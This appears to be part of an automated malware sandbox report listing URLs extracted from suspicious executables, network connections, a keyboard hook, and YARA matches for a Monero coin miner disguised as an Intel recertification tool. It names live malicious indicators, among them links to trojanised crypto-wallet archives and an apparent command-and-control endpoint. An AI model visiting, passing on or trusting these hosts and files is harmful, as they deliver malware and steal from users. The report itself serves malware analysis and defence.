Source: b2885fa695.exe, 00000020.00000003.2661685253.0000000005661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: 4115805b10.exe, 00000027.00000002.2796654960.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000002.2796654960.000002681097D000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E3658C4000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2795679412.000001E3658C4000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: 4115805b10.exe, 00000027.00000002.2796654960.000002681092B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/1
Source: 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/D
Source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000003.2774885034.00000268109DD000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000003.2774431697.00000268109D5000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2774431697.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E3658C4000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2795679412.000001E3658C4000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://ipinfo.io/json
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/json9
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/json=
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/jsonDriveoro
Source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
Source: 4115805b10.exe, 00000027.00000003.2774885034.00000268109DD000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2774431697.00000268109D5000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2795679412.000001E3658C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/missingauth
Source: 4115805b10.exe, 00000027.00000002.2796654960.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/na
Source: 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
Source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E3657E0000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E3657E0000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
Source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
Source: 4115805b10.exe, 00000028.00000003.2690741461.000001E365836000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692258593.000001E36584F000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692584026.000001E36584F000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691864511.000001E365847000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692021259.000001E36584F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://payments.google.com/
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671262555.000002681095A000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692258593.000001E36585C000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692584026.000001E365865000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691711392.000001E36585B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 4115805b10.exe, 00000028.00000003.2692258593.000001E36585C000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692584026.000001E365865000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691711392.000001E36585B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js60335477Zu
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js9A495B9est
Source: 4115805b10.exe, 00000028.00000003.2692258593.000001E36585C000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692584026.000001E365865000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691711392.000001E36585B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jsBACCDE8AZo
Source: 4115805b10.exe, 00000028.00000003.2690741461.000001E365836000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692258593.000001E36584F000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692584026.000001E36584F000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691864511.000001E365847000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692021259.000001E36584F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/
Source: 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsCF630DF4
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsF6033547
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: https://sectigo.com/CPS0
Source: b2885fa695.exe, 00000020.00000003.2582992344.00000000056C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: b2885fa695.exe, 00000020.00000003.2583140573.00000000056B9000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2605197612.00000000056B9000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582992344.00000000056C0000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2606132796.00000000056B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: b2885fa695.exe, 00000020.00000003.2583140573.0000000005694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: b2885fa695.exe, 00000020.00000003.2583140573.00000000056B9000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2605197612.00000000056B9000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582992344.00000000056C0000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2606132796.00000000056B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: b2885fa695.exe, 00000020.00000003.2583140573.0000000005694000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.0000000001489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treehoneyi.click/
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, 4cdf81e042.exe, 0000002C.00000002.2937965345.000000000149D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treehoneyi.click/api
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.00000000013C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treehoneyi.click/api$
Source: 4cdf81e042.exe, 0000002C.00000002.2937965345.000000000149D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://treehoneyi.click:443/api
Source: b2885fa695.exe, 00000020.00000003.2559195373.0000000000D42000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2559287290.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2559173290.0000000000D84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: b2885fa695.exe, 00000020.00000003.2559195373.0000000000D42000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2559173290.0000000000D84000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 4115805b10.exe, 00000028.00000003.2692021259.000001E36584F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: 4115805b10.exe, 00000028.00000003.2692258593.000001E36584F000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692584026.000001E36584F000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691864511.000001E365847000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692021259.000001E36584F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/aome
Source: 4115805b10.exe, 00000027.00000003.2671505089.00000268109A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/ate
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 4115805b10.exe, 00000028.00000003.2690741461.000001E365836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/l
Source: 4115805b10.exe, 00000027.00000003.2671210783.0000026810964000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671562167.0000026810965000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/olhkhi
Source: 4115805b10.exe, 00000028.00000003.2692258593.000001E36585C000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692584026.000001E365865000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691711392.000001E36585B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/s
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365817000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/vate
Source: 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691864511.000001E365847000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692021259.000001E36584F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2690889016.000001E365822000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/autJ
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 4115805b10.exe, 00000028.00000003.2692258593.000001E36585C000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2692584026.000001E365865000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691019358.000001E365823000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691711392.000001E36585B000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691434886.000001E36583B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly4C47B199FZd
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyCF630DF4
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyr
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore1gle
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreB4298L
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 4115805b10.exe, 00000027.00000003.2671674540.0000026810983000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2670962130.000002681097E000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671383618.000002681097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra(B
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra31C80D86845C0
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra9D97DA149A509p
Source: 4115805b10.exe, 00000027.00000003.2670730816.0000026810978000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox3z
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox5D15D
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandboxB54A8A
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: b2885fa695.exe, 00000020.00000003.2631727689.000000000578D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2530687816.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.2882244663.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2530687816.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.2882244663.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: Intel_PTT_EK_Recertification.exe, 0000001E.00000003.2521605943.000001FE626E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2530687816.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 0000002E.00000003.2876108637.00000202AA9D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.2882244663.00000001402DD000.00000002.00000001.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.91.209:443 -> 192.168.2.4:49925 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,00000000 6_2_00408DBB

System Summary

barindex
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 46.3.Intel_PTT_EK_Recertification.exe.202aa9d0000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.3.Intel_PTT_EK_Recertification.exe.1fe626e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 47.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 31.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
